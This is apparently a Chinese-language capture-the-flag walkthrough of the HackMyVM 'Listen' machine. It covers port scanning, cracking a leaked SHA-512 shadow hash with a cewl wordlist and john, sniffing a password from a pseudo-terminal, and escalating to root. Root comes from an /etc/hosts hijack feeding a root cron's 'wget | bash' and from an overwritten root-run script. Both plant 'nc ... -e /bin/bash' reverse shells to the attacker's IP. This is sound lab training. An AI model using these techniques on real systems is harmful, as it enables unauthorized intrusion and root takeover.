主机发现
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# arp-scan -I eth1 -l192.168.56.147 08:00:27:2a:db:7b PCS Systemtechnik GmbH主机地址为:192.168.56.147
端口扫描
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# nmap 192.168.56.147 -p-PORT STATE SERVICE22/tcp filteredssh80/tcp filtered http ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# nmap 192.168.56.147PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp第一次看到两个filtered,还以为有问题,再扫了一遍,发现都open了,估计是像之前一样,需要敲击某一个端口,但是使用nmap -p-误打误撞的敲击了
80端口探测
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# curl 192.168.56.147<pre><h1>Please Listen</h1>When I ask you to listen to me and you start giving me advice, You have notdonewhat I asked. When I ask you to listen to me and you begin to tell me why I shouldnt feel that way, you are trampling on my feelings. When I ask you to listen to me and you feel you have todosomething to solve my problem, you have failed me, strange as that may seem. Listen!All I ask is that you listen. Dont talk or do, just hear me… And I candoformyself;I am not helpless. Maybe discouraged and faltering, but not helpless. When youdosomethingforme that I can and need todoformyself, you contribute to my fear and Inadequacy. But when you accept as a simple fact That I feel what I feel, No matter how irrational, Then I can stop trying to convince You and get about this business Of understanding whats behind This irrational feeling. And when thats clear, the answers are obvious and I dont need advice. Irrational feelingsmakesense when we understand whats behind them. So please listen, and just hear me. Andifyou want to talk,waita minuteforyour turn, and I will listen to you. -Leo Buscaglia</pre><!-- Leo please, stop using your poems as password!leo:$6$GyxLtjMYaQWxRxfl$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7::: -->有一个shadow格式的内容,有句不要用诗歌做密码了,那上面诗歌中有单词是对应的密码
爆破leo用户密码
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# cewl 192.168.56.147 > pass.txt┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# echo "leo:\$6\$GyxLtjMYaQWxRxfl\$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7:::" > tmp┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# john tmp --wordlist=pass.txtUsing default input encoding: UTF-8 Loaded1passwordhash(sha512crypt, crypt(3)$6$[SHA512256/256 AVX2 4x])Cost1(iteration count)is5000forall loaded hashes Will run2OpenMP threads Press'q'or Ctrl-C to abort, almost any other keyforstatus contribute(leo)1g0:00:00:00 DONE(2025-12-17 00:27)5.555g/s600.0p/s600.0c/s600.0C/s CeWL6.2.1(More Fixes)Robin Wood(robin@digi.ninja)(https://digi.ninja/)..discouraged Use the"--show"option to display all of the cracked passwords reliably Session completed.成功拿到leo的密码/leo:contribute/
To leo
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# ssh leo@192.168.56.147leo@listen:~$iduid=1001(leo)gid=1001(leo)groups=1001(leo)leo@listen:~$To silence
查看家目录和当前用户目录
leo@listen:~$ls-al /home total20drwxr-xr-x5root root4096Oct162020.drwxr-xr-x18root root4096Oct162020..drwxr-xr-x2leo leo4096Oct162020leo drwxr-xr-x3listen listen4096Oct162020listen drwxr-xr-x3silence silence4096Oct162020silence leo@listen:~$ls-al total44drwxr-xr-x2leo leo4096Oct162020.drwxr-xr-x5root root4096Oct162020..-rw-------1leo leo12Oct162020.bash_history -rw-r--r--1leo leo220Oct162020.bash_logout -rw-r--r--1leo leo3526Oct162020.bashrc -rwsrws---1root leo16872Oct162020poem -rw-r--r--1leo leo807Oct162020.profile发现有三个用户,当前用户有个SUID权限的文件poem
反编译查看poem文件
int__fastcallmain(intargc,constchar**argv,constchar**envp){_BYTE v4[108];// [rsp+10h] [rbp-70h] BYREF//为初始化n5880intn5880;// [rsp+7Ch] [rbp-4h]printf("Ask me:\n ");//赋值给v4__isoc99_scanf("%s",v4);//判断变量n5880是否等于5880if(n5880==5880){setuid(0);setgid(0);system("/bin/bash");}else{puts("\nWhy");}return0;}那就是利用溢出去覆盖变量n5880
看文件有没有开启保护
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# checksec --file=./poemRELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH69Symbols No01./poem发现PIE是enable的
PIEPosition Independent Executable(位置无关可执行文件)
原理
普通可执行文件(如 ELF 格式)的代码段、数据段在编译时会被分配固定的虚拟内存地址;而 PIE 编译的程序,加载到内存时其整体基址会被随机化(属于 ASLR 地址空间布局随机化的一部分)。
作用
防御基于内存地址的攻击(如缓冲区溢出、ret2libc 等)—— 攻击者无法提前预测函数、系统调用的内存地址,大幅增加漏洞利用难度。
编译与检测
- 编译时启用 PIE(GCC):
gcc -fPIE -pie -o test test.c- 检测二进制文件是否开启 PIE:
readelf -h test | grep Type,若输出包含DYN (Shared object file)则为 PIE 可执行文件(普通可执行文件为EXEC)。攻防影响
- 防御侧:Linux 系统中许多系统程序默认开启 PIE,提升系统安全性。
- 攻击侧:需通过信息泄露(如泄露 libc 基址)、ROP 链构造等绕过 PIE 保护。
那不能利用栈溢出了
抓包
根据题目的意思,应该就是要抓包,但是我的环境或靶机有问题,导致我始终抓不到包
Knock me to port1337silence/listentome会抓到这两条消息
To listen
leo@listen:~$su- silence Password: silence@listen:~$iduid=1000(silence)gid=1000(silence)groups=1000(silence),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)查看文件
silence@listen:~$catnote.txt"listen"told me thatifI listen, I will hear his password....silence@listen:~$catlisten.sh#!/bin/shcat/home/listen/password.txt>/dev/pts/4
/dev/pts/4是 Linux 系统中的伪终端(Pseudo Terminal)设备文件,属于pts(Pseudo Terminal Slave)设备,用于表示一个交互式的终端会话(比如 SSH 连接、终端窗口、反弹 Shell 等)。Linux 中终端分为两类:
- 物理终端(
/dev/tty1-/dev/tty6):直接连接硬件的控制台(按Ctrl+Alt+F1-F6切换);- 伪终端(
/dev/pts/N):虚拟终端,用于远程连接(SSH)、图形化终端(GNOME Terminal)、Shell 模拟(如反弹 Shell)等,N是数字(如 4、5、6)。
所以开5个连接就好了,估计有个定时任务,等会最后连接的终端就会👇
┌──(root㉿xhh)-[~]└─# ssh silence@192.168.56.147Linux listen4.19.0-9-amd64#1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64The programs included with the Debian GNU/Linux system arefreesoftware;the exact distribution termsforeach program are describedinthe individual filesin/usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Dec1613:02:072025from192.168.56.247 silence@listen:~$ shhhhhh shhhhhh得到密码**/listen:shhhhhh/**
To root
silence@listen:~$su- listen Password: listen@listen:~$iduid=1002(listen)gid=1002(listen)groups=1002(listen)listen@listen:~$catlistentome.shwget-O - -q http://listen/ihearyou.sh|bash那一样,和上面那个一样是会定时执行
方式一:
有个域名解析,那看一下/etc/hosts文件
listen@listen:~$cat/etc/hosts127.0.0.1 localhost127.0.1.1 listen# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters listen@listen:~$ls-al /etc/hosts -rw-rw-r--1root listen186Oct162020/etc/hosts发现listen指向127.0.1.1,且/etc/hosts文件有写入权限
将127.0.1.1替换成攻击机IP,且攻击机上创建恶意ihearyou.sh后开启http服务👇
#靶机listen@listen:~$nano/etc/hosts listen@listen:~$cat/etc/hosts127.0.0.1 localhost192.168.56.247 listen# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters listen@listen:~$#攻击机┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# echo "nc 192.168.56.247 6666 -e /bin/bash" > ihearyou.sh┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]└─# python3 -m http.server 80Serving HTTP on0.0.0.0 port80(http://0.0.0.0:80/)...192.168.56.147 - -[17/Dec/2025 02:22:03]"GET /ihearyou.sh HTTP/1.1"200-成功获取到恶意文件,此时新建一个终端去接收反弹shell
┌──(root㉿xhh)-[~]└─# nc -lvnp 6666listening on[any]6666...idconnect to[192.168.56.247]from(UNKNOWN)[192.168.56.147]40080uid=0(root)gid=0(root)groups=0(root)方式二:
由于listentome.sh脚本是在listen家目录下,虽然是root的文件,但是可以删除,自己创建同名的恶意文件
listen@listen:~$echo"nc 192.168.56.247 6666 -e /bin/bash">listentome.sh listen@listen:~$ls-la total36drwxr-xr-x3listen listen4096Dec1613:27.drwxr-xr-x5root root4096Oct162020..-rw-r--r--1listen listen220Oct162020.bash_logout -rw-r--r--1listen listen3526Oct162020.bashrc -rw-r--r--1listen listen36Dec1613:27 listentome.sh drwxr-xr-x3listen listen4096Oct162020.local -rw-------1listen listen8Oct162020password.txt -rw-r--r--1listen listen807Oct162020.profile -rw-------1listen listen15Oct162020user.txt listen@listen:~$┌──(root㉿xhh)-[~]└─# nc -lvnp 6666listening on[any]6666...idconnect to[192.168.56.247]from(UNKNOWN)[192.168.56.147]40156uid=0(root)gid=0(root)groups=0(root)也成功获得root权限
user.txt
listen@listen:~$catuser.txt HMVimlisteningroot.txt
catroot.txt HMVthxforlisten
